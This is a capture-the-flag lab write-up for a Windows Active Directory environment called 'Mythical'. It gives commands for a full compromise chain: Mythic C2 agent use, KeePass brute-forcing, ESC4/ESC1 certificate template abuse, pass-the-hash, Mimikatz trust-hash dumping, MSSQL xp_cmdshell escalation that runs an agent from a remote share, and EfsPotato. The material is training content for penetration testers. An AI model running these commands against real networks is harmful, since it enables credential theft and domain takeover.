Mythical is a medium-difficulty Windows lab that simulates a post-breach assessment within a network hardened after a prior ransomware attack. Initial access is gained through a pre-established Mythic C2 session, allowing enumeration of internal infrastructure via a VPN tunnel. Backup misconfigurations expose sensitive data over rsync, leading to credential recovery from a KeePass database. Active Directory misconfigurations are exploited by escalating an ESC4 certificate template to ESC1, enabling certificate-based impersonation of a domain admin. Cross-domain trust abuse is performed by extracting the trust account hash and reusing it to access another domain, ultimately uncovering embedded credentials in a .NET binary. Privilege escalation is achieved by exploiting the TRUSTWORTHY setting in MSSQL to execute commands as sysadmin, and further access is gained using EfsPotato via SeImpersonate privileges—demonstrating how chained misconfigurations can still lead to complete domain compromise in an environment believed to be secured.

Enumeration

After signing in with the provided credentials, we’re presented with the Mythic C2 dashboard:

We can see two agents, one of which is active.

For an interactive shell, we can set both the interval and jitter time to 0. (Note: This is not recommended during real-world engagements.)

As we already have a domain-joined account, we use SharpHound to collect domain-related information.

Port Scan

The user momo is part of two interesting groups: Backup Admins and OpenVPN Administrators.

The IP configuration shows an active OpenVPN connection.

We scan the VPN IP range and identify DC01 and the Mythic server. Scanning more internal IPs later reveals another DC, DC02.

Rsync

In the _install folder, we find the sqlcmd installer, indicating a MSSQL server is present.
In the _admin directory, we find an rsync binary, suggesting rsync was used for backups.

Using an rsync client, we enumerate DC01’s backup directory, which contains the first flag and a KeePass database.

1
2
rync.exe -av list-only rsync://192.168.25.1
rync.exe -av rsync://192.168.25.1/mythical /temp

ADCS

KeePass

The database version isn’t supported by keepass2john.

We use keepass4brute to brute-force it using the CLI version of KeePass.

Once unlocked, we recover credentials for the domjoin user.

ESC 4

We use Certify to enumerate certificate templates and identify one vulnerable to ESC4. It allows enrollment and object control permissions for domain-joined computers.

Since momo lacks machine account creation privileges, we impersonate domjoin and create a new machine account using StandIn.

1
2
make_token mythical-US\domjoin <password>
execute_assembly -Assembly StandIn.exe -Arguments --computer szz --make



We then impersonate this new machine account.

Using PowerView, we modify the vulnerable certificate template to:

  1. Allow domain users to enroll.

  2. Enable impersonation of any user.

  3. Make the template valid for client authentication

    1
    2
    3
    4
    5
    6
    7
    8
    9
    #Enrollment Rights
    Add-DomainObjectAcl -TargetIdentity Machine -PrincipalIdentity "Domain Users" -RightsGUID "0e10c968-78fb-11d2-90d4-00c04f79dc55" -TargetSearchBase "LDAP://CN=Configuration,DC=mythical-us,DC=vl"

    #Impersonate Any Users
    Set-DomainObject -SearchBase "CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=mythical-us,DC=vl" -Identity Machine -XOR @{'mspki-certificate-name-flag'=1} -Verbose

    #Authentication Rights
    Set-DomainObject -SearchBase "CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=mythical-us,DC=vl" -Identity Machine -Set @{'mspki-certificate-application-policy'='1.3.6.1.5.5.7.3.2'} -Verbose

ESC 1

We now abuse the modified template to impersonate a Domain Administrator and request a certificate.
execute_assembly -Assembly Certify.exe -Arguments request /ca:dc01.mythical-us.vl\mythical-us-DC01-CA /template:Machine /altname:[email protected]

We export the certificate as .pfx using OpenSSL.
openssl pkcs12 -in admin.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx

We then use Rubeus to get a TGT and extract credentials.
execute_assembly Rubeus.exe asktgt /user:Administrator /certificate:c:windows\tasks\cert.pfx /ptt /nowrap /getcredentials

Finally, we use Pass-the-Hash to execute a beacon as Administrator.
powershell Invoke-SMBExec -Target 10.10.159.5 -Username administrator -Domain mythical-us.vl -Hash C583EF48C5ED66C727AECB6FAB87AC12 -Command "c:\programdata\google\update.exe"

Trust Account Abuse

BloodHound reveals a one-way trust from MYTHICAL-EU.VL to MYTHICAL-US.VL, allowing US users to authenticate in EU.

We dump the trust account NTLM hash using Mimikatz.
mimikatz "lsadump::trust /patch"

We use this hash with Rubeus to authenticate to MYTHICAL-EU.VL.
execute_assembly -Assembly Rubeus.exe -Arguments asktgt /user:MYTHICAL-US$ /domain:MYTHICAL-EU.VL /rc4:eb921a2b0e9d626559dab0f54fdc6498 /nowrap /ptt

Using this ticket, we enumerate shares on DC02 and discover getusers.exe, a .NET binary.

Disassembling it reveals credentials for svc_ldap.

Privilege Escalation

MSSQL - TRUSTWORTHY Abuse

With svc_ldap credentials, we enumerate AD users on DC02.
Get-ADUser -Filter * -Server "dc02.mythical-eu.vl" -Property DisplayName, SamAccountName | Select-Object DisplayName, SamAccountName

Often time companies reuse passwords for there service and administrative accounts. We check if the svc_ldap password works for svc_sql on the MSSQL server.
shell C:\windows\tasks\sql.exe -S tcp:10.10.153.71,1433 -Q "SELECT name, database_id, create_date FROM sys.databases;"

We identify that MSDB is TRUSTWORTHY and owned by svc_sql, allowing privilege escalation.

1
2
3
4
5
# Trusted Database
shell C:\windows\tasks\sql.exe -S tcp:10.10.153.71,1433 -Q "SELECT a.name,b.is_trustworthy_on FROM master..sysdatabases as a INNER JOIN sys.databases as b ON a.name=b.name;"

# Owners
shell C:\windows\tasks\sql.exe -S tcp:10.10.153.71,1433 -d msdb -Q "SELECT rp.name as database_role, mp.name as database_user from sys.database_role_members drm join sys.database_principals rp on (drm.role_principal_id = rp.principal_id) join sys.database_principals mp on (drm.member_principal_id = mp.principal_id)"

Next, we’ll use the svc_sql account to create a new stored procedure, escalate its privileges by assigning it the sysadmin role on the SQL server, and then enable xp_cmdshell to execute system commands.

1
2
3
4
5
6
7
8
# Give Sysadmin Rights
shell C:\windows\tasks\sql.exe -S tcp:10.10.153.71,1433 -d msdb -Q "CREATE OR ALTER PROCEDURE dbo.sz WITH EXECUTE AS owner AS ALTER SERVER ROLE sysadmin ADD MEMBER [MYTHICAL-EU\svc_sql];"
shell C:\windows\tasks\sql.exe -S tcp:10.10.153.71,1433 -d msdb -Q "EXEC dbo.sz;"

# Enable XP_CMDSHELL
shell C:\windows\tasks\sql.exe -S tcp:10.10.153.71,1433 -d msdb -Q  "EXEC sp_configure 'show advanced options', 1; Reconfigure;"
shell C:\windows\tasks\sql.exe -S tcp:10.10.153.71,1433 -d msdb -Q "EXEC sp_configure 'xp_cmdshell', 1; Reconfigure;"
shell C:\windows\tasks\sql.exe -S tcp:10.10.153.71,1433 -d msdb -Q "EXEC xp_cmdshell 'whoami'"

We host our agent on a shared folder from DC01 and execute it via xp_cmdshell.

1
2
3
4
5
6
7
# Accessible server
mkdir -Path C:\temp
shell net share temp=C:\temp /grant:everyone,full
cp -Source c:\programdata\google\update.exe -Destination C:\temp\update.exe

# Agent Callback
shell C:\windows\tasks\sql.exe -S tcp:10.10.153.71,1433 -d msdb -Q "EXEC xp_cmdshell '\\10.10.153.69\temp\update.exe'"

SeImpersonate

The current user has SeImpersonatePrivilege

We use EfsPotato to impersonate an admin and execute our agent.
execute_assembly -Assembly EfsPotato_4.0_x64.exe -Arguments \\10.10.153.69\temp\update.exe